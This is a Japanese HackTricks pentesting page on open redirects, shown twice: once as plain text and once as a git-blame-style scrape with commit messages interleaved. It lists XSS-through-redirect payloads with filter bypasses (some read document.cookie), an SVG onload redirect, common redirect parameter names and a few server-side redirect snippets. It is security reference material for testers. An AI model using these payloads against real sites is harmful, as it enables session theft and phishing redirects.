hacktricks/pentesting-web/open-redirect.md

# オープンリダイレクト

{% hint style="success" %}
AWSハッキングを学び、実践する：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、実践する：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricksをサポートする</summary>

* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください！
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**

</details>
{% endhint %}

## オープンリダイレクト

### localhostまたは任意のドメインへのリダイレクト

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

### XSSへのオープンリダイレクト
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
## Open Redirect SVGファイルのアップロード
```markup
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
## 一般的なインジェクションパラメータ
```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
## コード例

#### .Net
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
#### Java
```bash
response.redirect("http://mysafedomain.com");
```
#### PHP
```php
<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
```
## ツール

* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)

## リソース

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) ではファジングリストを見つけることができます。\\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\
* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)

{% hint style="success" %}
AWSハッキングを学び、練習する：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、練習する：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricksをサポートする</summary>

* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください！
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**

</details>
{% endhint %}
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								# オープンリダイレクト
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								{% hint style="success" %}
 								AWSハッキングを学び、実践する：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCPハッキングを学び、実践する：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								<summary>HackTricksをサポートする</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください！
 								* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
 								* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								## オープンリダイレクト
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								### localhostまたは任意のドメインへのリダイレクト
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
+								{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
 								[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
 								{% endcontent-ref %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								### XSSへのオープンリダイレクト
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Basic payload, javascript code is executed after "javascript:"
 								javascript:alert(1)
 								#Bypass "javascript" word filter with CRLF
 								java%0d%0ascript%0d%0a:alert(0)
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								# Abuse bad subdomain filter
 								javascript://sub.domain.com/%0Aalert(1)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
 								#This bypasses FILTER_VALIDATE_URL os PHP
 								javascript://%250Aalert(1)
 								#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
 								javascript://%250Aalert(1)//?1
 								javascript://%250A1?alert(1):0
 								#Others
 								%09Jav%09ascript:alert(document.domain)
 								javascript://%250Alert(document.location=document.cookie)
 								/%09/javascript:alert(1);
 								/%09/javascript:alert(1)
 								//%5cjavascript:alert(1);
 								//%5cjavascript:alert(1)
 								/%5cjavascript:alert(1);
 								/%5cjavascript:alert(1)
 								javascript://%0aalert(1)
 								<>javascript:alert(1);
 								//javascript:alert(1);
 								//javascript:alert(1)
 								/javascript:alert(1);
 								/javascript:alert(1)
 								\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
 								javascript:alert(1);
 								javascript:alert(1)
 								javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
 								javascript:confirm(1)
 								javascript://https://whitelisted.com/?z=%0Aalert(1)
 								javascript:prompt(1)
 								jaVAscript://whitelisted.com//%0d%0aalert(1);//
 								javascript://whitelisted.com?%a0alert%281%29
 								/x:1/:///%01javascript:alert(document.cookie)/
 								";alert(0);//
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								## Open Redirect SVGファイルのアップロード
-												GitBook: [master] one page modified
											
										
										
											2020-12-01 10:55:31 +00:00
+								```markup
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<code>
 								<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
 								<svg
 								onload="window.location='http://www.example.com'"
 								xmlns="http://www.w3.org/2000/svg">
 								</svg>
 								</code>
 								```
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								## 一般的なインジェクションパラメータ
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								/{payload}
 								?next={payload}
 								?url={payload}
 								?target={payload}
 								?rurl={payload}
 								?dest={payload}
 								?destination={payload}
 								?redir={payload}
 								?redirect_uri={payload}
 								?redirect_url={payload}
 								?redirect={payload}
 								/redirect/{payload}
 								/cgi-bin/redirect.cgi?{payload}
 								/out/{payload}
 								/out?{payload}
 								?view={payload}
 								/login?to={payload}
 								?image_url={payload}
 								?go={payload}
 								?return={payload}
 								?returnTo={payload}
 								?return_to={payload}
 								?checkout_url={payload}
 								?continue={payload}
 								?return_path={payload}
 								success=https://c1h2e1.github.io
 								data=https://c1h2e1.github.io
 								qurl=https://c1h2e1.github.io
 								login=https://c1h2e1.github.io
 								logout=https://c1h2e1.github.io
 								ext=https://c1h2e1.github.io
 								clickurl=https://c1h2e1.github.io
 								goto=https://c1h2e1.github.io
 								rit_url=https://c1h2e1.github.io
 								forward_url=https://c1h2e1.github.io
 								@https://c1h2e1.github.io
 								forward=https://c1h2e1.github.io
 								pic=https://c1h2e1.github.io
 								callback_url=https://c1h2e1.github.io
 								jump=https://c1h2e1.github.io
 								jump_url=https://c1h2e1.github.io
 								click?u=https://c1h2e1.github.io
 								originUrl=https://c1h2e1.github.io
 								origin=https://c1h2e1.github.io
 								Url=https://c1h2e1.github.io
 								desturl=https://c1h2e1.github.io
 								u=https://c1h2e1.github.io
 								page=https://c1h2e1.github.io
 								u1=https://c1h2e1.github.io
 								action=https://c1h2e1.github.io
 								action_url=https://c1h2e1.github.io
 								Redirect=https://c1h2e1.github.io
 								sp_url=https://c1h2e1.github.io
 								service=https://c1h2e1.github.io
 								recurl=https://c1h2e1.github.io
 								j?url=https://c1h2e1.github.io
 								url=//https://c1h2e1.github.io
 								uri=https://c1h2e1.github.io
 								u=https://c1h2e1.github.io
 								allinurl:https://c1h2e1.github.io
 								q=https://c1h2e1.github.io
 								link=https://c1h2e1.github.io
 								src=https://c1h2e1.github.io
 								tc?src=https://c1h2e1.github.io
 								linkAddress=https://c1h2e1.github.io
 								location=https://c1h2e1.github.io
 								burl=https://c1h2e1.github.io
 								request=https://c1h2e1.github.io
 								backurl=https://c1h2e1.github.io
 								RedirectUrl=https://c1h2e1.github.io
 								Redirect=https://c1h2e1.github.io
 								ReturnUrl=https://c1h2e1.github.io
 								```
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								## コード例
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								#### .Net
-												GitBook: [master] 2 pages modified
											
										
										
											2020-10-22 09:33:22 +00:00
+								```bash
 								response.redirect("~/mysafe-subdomain/login.aspx")
 								```
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								#### Java
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:23:12 +00:00
+								```bash
 								response.redirect("http://mysafedomain.com");
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh

											
										
										
											2024-02-06 04:13:43 +00:00
+								```
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								#### PHP
-												GitBook: [master] 2 pages modified
											
										
										
											2020-10-22 09:33:22 +00:00
+								```php
 								<?php
 								/* browser redirections*/
 								header("Location: http://mysafedomain.com");
 								exit;
 								?>
 								```
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								## ツール
-												GitBook: [master] 354 pages modified
											
										
										
											2020-07-29 09:22:22 +00:00
 								* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
-												Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

											
										
										
											2024-05-14 11:15:17 +00:00
+								## リソース
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) ではファジングリストを見つけることができます。\\
 								* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh

											
										
										
											2024-02-06 04:13:43 +00:00
+								* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 								* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								{% hint style="success" %}
 								AWSハッキングを学び、練習する：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCPハッキングを学び、練習する：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								<summary>HackTricksをサポートする</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください！
 								* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
 								* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:28:25 +00:00
+								{% endhint %}